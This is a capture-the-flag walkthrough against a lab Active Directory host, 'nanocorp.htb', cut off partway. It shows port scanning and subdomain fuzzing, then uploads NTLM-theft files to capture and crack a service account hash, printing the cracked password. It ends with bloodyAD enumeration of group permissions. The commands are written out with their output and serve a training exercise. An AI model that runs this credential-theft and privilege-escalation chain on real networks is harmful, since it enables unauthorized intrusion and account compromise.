by 0xW1LD

As usual, we start off with an nmap port scan.
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-title: Nanocorp
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-11-09 05:45:24Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: nanocorp.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: nanocorp.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5986/tcp open ssl/http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| tls-alpn:
|_ http/1.1
|_http-server-header: Microsoft-HTTPAPI/2.0
| ssl-cert: Subject: commonName=dc01.nanocorp.htb
| Subject Alternative Name: DNS:dc01.nanocorp.htb
| Issuer: commonName=dc01.nanocorp.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-06T22:58:43
| Not valid after: 2026-04-06T23:18:43
| MD5: 2e3e:1a10:10b8:7f43:dc93:a4d9:05ef:6053
| SHA-1: 4674:6312:27ce:e783:91b7:ec00:1746:f114:d669:4ea0
| -----BEGIN CERTIFICATE-----
| MIIDMDCCAhigAwIBAgIQIG1hb/WXAZBNVk/iii5EyjANBgkqhkiG9w0BAQsFADAc
| MRowGAYDVQQDDBFkYzAxLm5hbm9jb3JwLmh0YjAeFw0yNTA0MDYyMjU4NDNaFw0y
| NjA0MDYyMzE4NDNaMBwxGjAYBgNVBAMMEWRjMDEubmFub2NvcnAuaHRiMIIBIjAN
| BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvhk2VBmIaEaly06th345bTcNsYcV
| D4rgwzD861bdYfo3DYKG0XykF5u1O17P/jO7TUokAfQB2IeNTAb77ZU1iK1PdCCX
| bv6jeV+MEgsJcvCUSYdX5eEurSnDgTteegJ5APzUVgleNaFMkQi7rB9gG422AJov
| fJzCxPHm0irdfJt0cH5JRGg1+5zcm3A8FzQ1WxBS0KfmfMKCYhnFufpiUcFMtire
| azOyDb4IXFEpWuDVuPrr0O5GwWIiHlydtfY5u8+AeDaIEFHfP2qtN4T+6BEyadOT
| hdbPLxx53qFxAWVfoHjr6M9RWUHKEVmRBacBa4Jjj5VzEWt0IJM9Nq7/2QIDAQAB
| o24wbDAOBgNVHQ8BAf8EBAMCBaAwHQYDVR0lBBYwFAYIKwYBBQUHAwIGCCsGAQUF
| BwMBMBwGA1UdEQQVMBOCEWRjMDEubmFub2NvcnAuaHRiMB0GA1UdDgQWBBQaIgqw
| fFwJfesMFBU9Usbf0k55ODANBgkqhkiG9w0BAQsFAAOCAQEAY84V2Zwkjqqiraun
| KN+g7VoDri61Yn4U6DnVHt2h87gJRNVPukb64oAIqbTuyVRDe9CKtQo8SDul/x/Y
| GbNu0oHXYssqx37uowexR3AwoYkg1rLiRKik1cYbjawVjCUZ8ZEL1OLsMg362uaG
| hEvxeACIwiuoEpPXNWsLr4Vx44ImHMNVEeQg3luTTE/YcaProZO+/7TkB8yj1RbT
| D2hom7Eo8cGz5hVxCsHyv+KjUkWGC/prCEZXKgO+yHwc/ZGQIYnO0gEaNWnxlal5
| hFH4guGtiqkjjSQgPdSrCSxpEE1tHssCualeYyyMtxLq/dNLNSK+uRX+/A0/F7An
| VGJ53g==
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49671/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
53532/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
57820/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
57839/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 39598/tcp): CLEAN (Timeout)
| Check 2 (port 58820/tcp): CLEAN (Timeout)
| Check 3 (port 27537/udp): CLEAN (Timeout)
| Check 4 (port 62849/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
| date: 2025-11-09T05:46:19
|_ start_date: N/A
|_clock-skew: 6h59m59s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Looks like we have a standard AD suite with some changes.
Port 80 is running an Apache web server. Port 5986 is open, which means WinRM is exposed over HTTPS (WinRMS) rather than plain WinRM. Visiting http://nanocorp.htb we find a cybersecurity website.

Looking around the only thing of interest would be the contact form.

However, we don't get much feedback on any attempted web vulnerability, so we can leave it for now.
Let’s start fuzzing for subdomains.
ffuf -u http://nanocorp.htb -H "Host: FUZZ.nanocorp.htb" -w /usr/share/wordlists/seclists/Discovery/DNS/n0kovo_subdomains.txt -mc all -fc 301
/ ___\ / ___\ / ___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://nanocorp.htb
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/n0kovo_subdomains.txt
:: Header : Host: FUZZ.nanocorp.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: all
:: Filter : Response status: 301
________________________________________________
hire [Status: 200, Size: 2520, Words: 646, Lines: 68, Duration: 352ms]
We find the hire subdomain; let's add it to our /etc/hosts file and take a look.
We are greeted by a simple application form with a file upload.

Seems we can upload a zip file.
Since we know it's an Active Directory environment, let's attempt to upload a zip file containing NTLM theft files. We can use the NTLM theft methods shown on HackTricks.
First, let's create the files; I'll make three.
ls -lash
total 20K
4.0K drwxrwxr-x 2 kali kali 4.0K Nov 8 18:05 .
4.0K drwxrwxr-x 4 kali kali 4.0K Nov 8 18:04 ..
4.0K -rw-rw-r-- 1 kali kali 617 Nov 8 18:05 .library-ms
4.0K -rw-rw-r-- 1 kali kali 147 Nov 8 18:04 w1ld.asx
4.0K -rw-rw-r-- 1 kali kali 90 Nov 8 18:05 w1ld.lnk
Next, let's zip them up.
zip w1ld.zip * .[^.]*
adding: w1ld.asx (deflated 24%)
adding: w1ld.lnk (deflated 8%)
adding: .library-ms (deflated 48%)
Let's upload this archive and start Responder.
sudo responder -I tun0
[sudo] password for kali:
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.61]
Responder IPv6 [dead:beef:2::103b]
Challenge set [random]
Dont Respond To Names ['ISATAP', 'ISATAP.LOCAL']
Dont Respond To MDNS TLD ['_DOSVC']
TTL for poisoned response [default]
[+] Current Session Variables:
Responder Machine Name [WIN-71QK5W5Z1O7]
Responder Domain Name [5FPR.LOCAL]
Responder DCE-RPC Port [45530]
[*] Version: Responder 3.1.7.0
[*] Author: Laurent Gaffie, <lgaffie@secorizon.com>
[*] To sponsor Responder: https://paypal.me/PythonResponder
[+] Listening for events...
After a bit of waiting we capture an NTLMv2 hash!
[SMB] NTLMv2-SSP Client : 10.129.130.72
[SMB] NTLMv2-SSP Username : NANOCORP\web_svc
[SMB] NTLMv2-SSP Hash : web_svc::NANOCORP:4da0b584507943f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
Let’s start cracking this using hashcat.
hashcat -m 5600 -a 0 web_svc.pem /usr/share/wordlists/rockyou.txt.gz
<SNIP>
WEB_SVC::NANOCORP:4da0b584507943f8:4f9a62848a45767e82918738241f09a1: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:dksehdgh712!@#
We’ve got a successful crack so let’s now check our authentication to the domain.
nxc ldap 'dc01.nanocorp.htb' -u 'web_svc' -p 'dksehdgh712!@#' -M whoami
LDAP 10.129.130.72 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:nanocorp.htb) (signing:None) (channel binding:No TLS cert)
LDAP 10.129.130.72 389 DC01 [+] nanocorp.htb\web_svc:dksehdgh712!@#
WHOAMI 10.129.130.72 389 DC01 Name: web_svc
WHOAMI 10.129.130.72 389 DC01 sAMAccountName: web_svc
WHOAMI 10.129.130.72 389 DC01 Enabled: Yes
WHOAMI 10.129.130.72 389 DC01 Password Never Expires: Yes
WHOAMI 10.129.130.72 389 DC01 User Principal Name: web_svc@nanocorp.htb
WHOAMI 10.129.130.72 389 DC01 Last logon: 2025-11-09 06:13:29 UTC
WHOAMI 10.129.130.72 389 DC01 Password Last Set: 2025-04-09 22:59:38 UTC
WHOAMI 10.129.130.72 389 DC01 Bad Password Count: 0
WHOAMI 10.129.130.72 389 DC01 Distinguished Name: CN=web_svc,CN=Users,DC=nanocorp,DC=htb
WHOAMI 10.129.130.72 389 DC01 User SID: S-1-5-21-2261381271-1331810270-697239744-1103
We now have authentication to the domain. You could continue here by collecting BloodHound data; however, I'll show a method of forming a path without using BloodHound.
First, we check which objects we can write to.
bloodyAD -d 'nanocorp.htb' --host 'dc01.nanocorp.htb' -u 'web_svc' -p 'dksehdgh712!@#' get writable
distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=nanocorp,DC=htb
permission: WRITE
distinguishedName: CN=web_svc,CN=Users,DC=nanocorp,DC=htb
permission: WRITE
Since we didn't get much, there's no real use in checking the details of those write permissions. Instead, let's grab our own SID to use as a reference later.
bloodyAD -d 'nanocorp.htb' --host 'dc01.nanocorp.htb' -u 'web_svc' -p 'dksehdgh712!@#' get object 'web_svc' --attr objectSid
distinguishedName: CN=web_svc,CN=Users,DC=nanocorp,DC=htb
objectSid: S-1-5-21-2261381271-1331810270-697239744-1103
Next, let's dump the nTSecurityDescriptor attributes, also known as security descriptors (SDs), of every object we can read.
bloodyAD -d 'nanocorp.htb' --host 'dc01.nanocorp.htb' -u 'web_svc' -p 'dksehdgh712!@#' get search --attr nTSecurityDescriptor > SDs.txt
Depending on the size of the environment, grabbing the SDs may take a while, so grab a coffee; in this case it was rather quick since the environment is small.
Next, we can search the SDs for our SID.
grep 'S-1-5-21-2261381271-1331810270-697239744-1103' SDs.txt -B 1
distinguishedName: CN=IT_Support,CN=Users,DC=nanocorp,DC=htb
nTSecurityDescriptor: O:S-1-5-21-2261381271-1331810270-697239744-512G:S-1-5-21-2261381271-1331810270-697239744-512D:AI(OA;;SW;bf9679c0-0de6-11d0-a285-00aa003049e2;;S-1-5-21-2261381271-1331810270-697239744-1103)(OA;;RP;46a9b11d-60ae-405a-b7e8-ff8a58d456d2;;S-1-5-32-560)(OA;;CR;ab721a55-1e2f-11d0-9819-00aa0040529b;;S-1-5-11)(A;;0x20014;;;S-1-5-21-2261381271-1331810270-697239744-1103)(A;;0xf01ff;;;S-1-5-21-2261381271-1331810270-697239744-512)(A;;0xf01ff;;;S-1-5-32-548)(A;;0x20094;;;S-1-5-10)(A;;0x20094;;;S-1-5-11)(A;;0xf01ff;;;S-1-5-18)(OA;CIIOID;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIIOID;RP;4c164200-20c0-11d0-a768-00aa006e0529;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIIOID;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIIOID;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIIOID;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIIOID;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIID;0x30;5b47d60f-6090-40b2-9f37-2a4de88f3063;;S-1-5-21-2261381271-1331810270-697239744-526)(OA;CIID;0x30;5b47d60f-6090-40b2-9f37-2a4de88f3063;;S-1-5-21-2261381271-1331810270-697239744-527)(OA;CIIOID;SW;9b026da6-0d3c-465c-8bee-5199d7165cba;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-3-0)(OA;CIIOID;SW;9b026da6-0d3c-465c-8bee-5199d7165cba;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-5-10)(OA;CIIOID;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6
-11d0-a285-00aa003049e2;S-1-5-9)(OA;CIID;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;S-1-5-9)(OA;CIIOID;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-9)(OA;CIIOID;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-5-10)(OA;CIIOID;0x20094;;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIID;0x20094;;bf967a9c-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;0x20094;;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;OICIID;0x30;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;S-1-5-10)(OA;CIID;0x130;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;S-1-5-10)(A;CIID;0xf01ff;;;S-1-5-21-2261381271-1331810270-697239744-519)(A;CIID;LC;;;S-1-5-32-554)(A;CIID;0xf01bd;;;S-1-5-32-544)
Looks like we have a match on the IT_Support group; let's take a deeper look at this object.
bloodyAD -d 'nanocorp.htb' --host 'dc01.nanocorp.htb' -u 'web_svc' -p 'dksehdgh712!@#' get object 'IT_Support' --resolve-sd
distinguishedName: CN=IT_Support,CN=Users,DC=nanocorp,DC=htb
cn: IT_Support
dSCorePropagationData: 2025-04-09 22:55:41+00:00
groupType: -2147483646
instanceType: 4
nTSecurityDescriptor.Owner: Domain Admins
nTSecurityDescriptor.Control: DACL_AUTO_INHERITED|DACL_PRESENT|SACL_AUTO_INHERITED|SELF_RELATIVE
+ nTSecurityDescriptor.ACL.0.Type: == ALLOWED_OBJECT ==
+ nTSecurityDescriptor.ACL.0.Trustee: web_svc
+ nTSecurityDescriptor.ACL.0.Right: WRITE_VALIDATED
nTSecurityDescriptor.ACL.0.ObjectType: Member
nTSecurityDescriptor.ACL.1.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.1.Trustee: WINDOWS_AUTHORIZATION_ACCESS_GROUP
nTSecurityDescriptor.ACL.1.Right: READ_PROP
nTSecurityDescriptor.ACL.1.ObjectType: Token-Groups-Global-And-Universal
nTSecurityDescriptor.ACL.2.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.2.Trustee: AUTHENTICATED_USERS
nTSecurityDescriptor.ACL.2.Right: CONTROL_ACCESS
nTSecurityDescriptor.ACL.2.ObjectType: Send-To
+ nTSecurityDescriptor.ACL.3.Type: == ALLOWED ==
+ nTSecurityDescriptor.ACL.3.Trustee: web_svc
+ nTSecurityDescriptor.ACL.3.Right: GENERIC_EXECUTE|READ_PROP
nTSecurityDescriptor.ACL.3.ObjectType: Self
nTSecurityDescriptor.ACL.4.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.4.Trustee: LOCAL_SYSTEM; ACCOUNT_OPERATORS; Domain Admins
nTSecurityDescriptor.ACL.4.Right: GENERIC_ALL
nTSecurityDescriptor.ACL.4.ObjectType: Self
nTSecurityDescriptor.ACL.5.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.5.Trustee: AUTHENTICATED_USERS; PRINCIPAL_SELF
nTSecurityDescriptor.ACL.5.Right: GENERIC_READ
nTSecurityDescriptor.ACL.5.ObjectType: Self
nTSecurityDescriptor.ACL.6.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.6.Trustee: ALIAS_PREW2KCOMPACC
nTSecurityDescriptor.ACL.6.Right: READ_PROP
nTSecurityDescriptor.ACL.6.ObjectType: General-Information (property set); Remote-Access-Information (property set); Account-Restrictions (property set); Logon-Information (property set); Group-Membership (property set)
nTSecurityDescriptor.ACL.6.InheritedObjectType: User; inetOrgPerson
nTSecurityDescriptor.ACL.6.Flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
nTSecurityDescriptor.ACL.7.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.7.Trustee: Enterprise Key Admins; Key Admins
nTSecurityDescriptor.ACL.7.Right: WRITE_PROP|READ_PROP
nTSecurityDescriptor.ACL.7.ObjectType: ms-DS-Key-Credential-Link
nTSecurityDescriptor.ACL.7.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.8.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.8.Trustee: PRINCIPAL_SELF; CREATOR_OWNER
nTSecurityDescriptor.ACL.8.Right: WRITE_VALIDATED
nTSecurityDescriptor.ACL.8.ObjectType: DS-Validated-Write-Computer
nTSecurityDescriptor.ACL.8.InheritedObjectType: Computer
nTSecurityDescriptor.ACL.8.Flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
nTSecurityDescriptor.ACL.9.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.9.Trustee: ENTERPRISE_DOMAIN_CONTROLLERS
nTSecurityDescriptor.ACL.9.Right: READ_PROP
nTSecurityDescriptor.ACL.9.ObjectType: Token-Groups
nTSecurityDescriptor.ACL.9.InheritedObjectType: User; Computer
nTSecurityDescriptor.ACL.9.Flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
nTSecurityDescriptor.ACL.10.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.10.Trustee: ENTERPRISE_DOMAIN_CONTROLLERS
nTSecurityDescriptor.ACL.10.Right: READ_PROP
nTSecurityDescriptor.ACL.10.ObjectType: Token-Groups
nTSecurityDescriptor.ACL.10.InheritedObjectType: Group
nTSecurityDescriptor.ACL.10.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.11.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.11.Trustee: PRINCIPAL_SELF
nTSecurityDescriptor.ACL.11.Right: WRITE_PROP
nTSecurityDescriptor.ACL.11.ObjectType: ms-TPM-Tpm-Information-For-Computer
nTSecurityDescriptor.ACL.11.InheritedObjectType: Computer
nTSecurityDescriptor.ACL.11.Flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
nTSecurityDescriptor.ACL.12.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.12.Trustee: ALIAS_PREW2KCOMPACC
nTSecurityDescriptor.ACL.12.Right: GENERIC_READ
nTSecurityDescriptor.ACL.12.ObjectType: Self
nTSecurityDescriptor.ACL.12.InheritedObjectType: User; inetOrgPerson
nTSecurityDescriptor.ACL.12.Flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
nTSecurityDescriptor.ACL.13.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.13.Trustee: ALIAS_PREW2KCOMPACC
nTSecurityDescriptor.ACL.13.Right: GENERIC_READ
nTSecurityDescriptor.ACL.13.ObjectType: Self
nTSecurityDescriptor.ACL.13.InheritedObjectType: Group
nTSecurityDescriptor.ACL.13.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.14.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.14.Trustee: PRINCIPAL_SELF
nTSecurityDescriptor.ACL.14.Right: WRITE_PROP|READ_PROP
nTSecurityDescriptor.ACL.14.ObjectType: ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity
nTSecurityDescriptor.ACL.14.Flags: CONTAINER_INHERIT; INHERITED; OBJECT_INHERIT
nTSecurityDescriptor.ACL.15.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.15.Trustee: PRINCIPAL_SELF
nTSecurityDescriptor.ACL.15.Right: CONTROL_ACCESS|WRITE_PROP|READ_PROP
nTSecurityDescriptor.ACL.15.ObjectType: Private-Information (property set)
nTSecurityDescriptor.ACL.15.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.16.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.16.Trustee: Enterprise Admins
nTSecurityDescriptor.ACL.16.Right: GENERIC_ALL
nTSecurityDescriptor.ACL.16.ObjectType: Self
nTSecurityDescriptor.ACL.16.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.17.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.17.Trustee: ALIAS_PREW2KCOMPACC
nTSecurityDescriptor.ACL.17.Right: LIST_CHILD
nTSecurityDescriptor.ACL.17.ObjectType: Self
nTSecurityDescriptor.ACL.17.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.18.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.18.Trustee: BUILTIN_ADMINISTRATORS
nTSecurityDescriptor.ACL.18.Right: WRITE_OWNER|WRITE_DACL|GENERIC_READ|DELETE|CONTROL_ACCESS|WRITE_PROP|WRITE_VALIDATED|CREATE_CHILD
nTSecurityDescriptor.ACL.18.ObjectType: Self
nTSecurityDescriptor.ACL.18.Flags: CONTAINER_INHERIT; INHERITED
name: IT_Support
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=nanocorp,DC=htb
objectClass: top; group
objectGUID: 21e5793e-aca6-48f7-90b6-cd123bc3dd53
objectSid: S-1-5-21-2261381271-1331810270-697239744-3102
sAMAccountName: IT_Support
sAMAccountType: 268435456
uSNChanged: 77983
uSNCreated: 77964
whenChanged: 2025-04-09 22:55:41+00:00
whenCreated: 2025-04-09 22:54:07+00:00
Looks like we have a couple of permissions: Write Validated, Generic Execute and Read Property. The Write Validated permission (an object-specific ACE on the Member attribute) is the most powerful, as it allows us to add and remove objects from the group. But what use is this group to us? Let's check SDs.txt for its SID.
grep 'S-1-5-21-2261381271-1331810270-697239744-3102' SDs.txt -B 1
distinguishedName: CN=monitoring_svc,OU=AD_Monitoring,DC=nanocorp,DC=htb
nTSecurityDescriptor: O:S-1-5-21-2261381271-1331810270-697239744-512G:S-1-5-21-2261381271-1331810270-697239744-512D:(OA;;RP;4c164200-20c0-11d0-a768-00aa006e0529;;S-1-5-21-2261381271-1331810270-697239744-553)(OA;;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;;S-1-5-21-2261381271-1331810270-697239744-553)(OA;;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;;S-1-5-21-2261381271-1331810270-697239744-553)(OA;;RP;037088f8-0ae1-11d2-b422-00a0c968f939;;S-1-5-21-2261381271-1331810270-697239744-553)(OA;;0x30;bf967a7f-0de6-11d0-a285-00aa003049e2;;S-1-5-21-2261381271-1331810270-697239744-517)(OA;;RP;46a9b11d-60ae-405a-b7e8-ff8a58d456d2;;S-1-5-32-560)(OA;;0x30;6db69a1c-9422-11d1-aebd-0000f80367c1;;S-1-5-32-561)(OA;;0x30;5805bc62-bdc9-4428-a5e2-856a0f4c185e;;S-1-5-32-561)(OA;;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;;S-1-1-0)(OA;;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;;S-1-5-10)(OA;;CR;ab721a54-1e2f-11d0-9819-00aa0040529b;;S-1-5-10)(OA;;CR;ab721a56-1e2f-11d0-9819-00aa0040529b;;S-1-5-10)(OA;;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;;S-1-5-11)(OA;;RP;e48d0154-bcf8-11d1-8702-00c04fb96050;;S-1-5-11)(OA;;RP;77b5b886-944a-11d1-aebd-0000f80367c1;;S-1-5-11)(OA;;RP;e45795b3-9455-11d1-aebd-0000f80367c1;;S-1-5-11)(OA;;0x30;77b5b886-944a-11d1-aebd-0000f80367c1;;S-1-5-10)(OA;;0x30;e45795b2-9455-11d1-aebd-0000f80367c1;;S-1-5-10)(OA;;0x30;e45795b3-9455-11d1-aebd-0000f80367c1;;S-1-5-10)(A;;0xf01ff;;;S-1-5-21-2261381271-1331810270-697239744-512)(A;;0xf01ff;;;S-1-5-32-548)(A;;RC;;;S-1-5-11)(A;;0x20094;;;S-1-5-10)(A;;0xf01ff;;;S-1-5-18)(OA;CIID;CR;00299570-246d-11d0-a768-00aa006e0529;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-2261381271-1331810270-697239744-3102)(OA;CIID;0x20014;;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-2261381271-1331810270-697239744-3102)(OA;CIIOID;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIID;RP;4c164200-20c0-11d0-a768-00aa006e0529;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;48
28cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIID;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIID;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIID;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIID;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIID;0x30;5b47d60f-6090-40b2-9f37-2a4de88f3063;;S-1-5-21-2261381271-1331810270-697239744-526)(OA;CIID;0x30;5b47d60f-6090-40b2-9f37-2a4de88f3063;;S-1-5-21-2261381271-1331810270-697239744-527)(OA;CIIOID;SW;9b026da6-0d3c-465c-8bee-5199d7165cba;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-3-0)(OA;CIIOID;SW;9b026da6-0d3c-465c-8bee-5199d7165cba;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-5-10)(OA;CIIOID;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-5-9)(OA;CIIOID;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;S-1-5-9)(OA;CIID;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-9)(OA;CIIOID;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-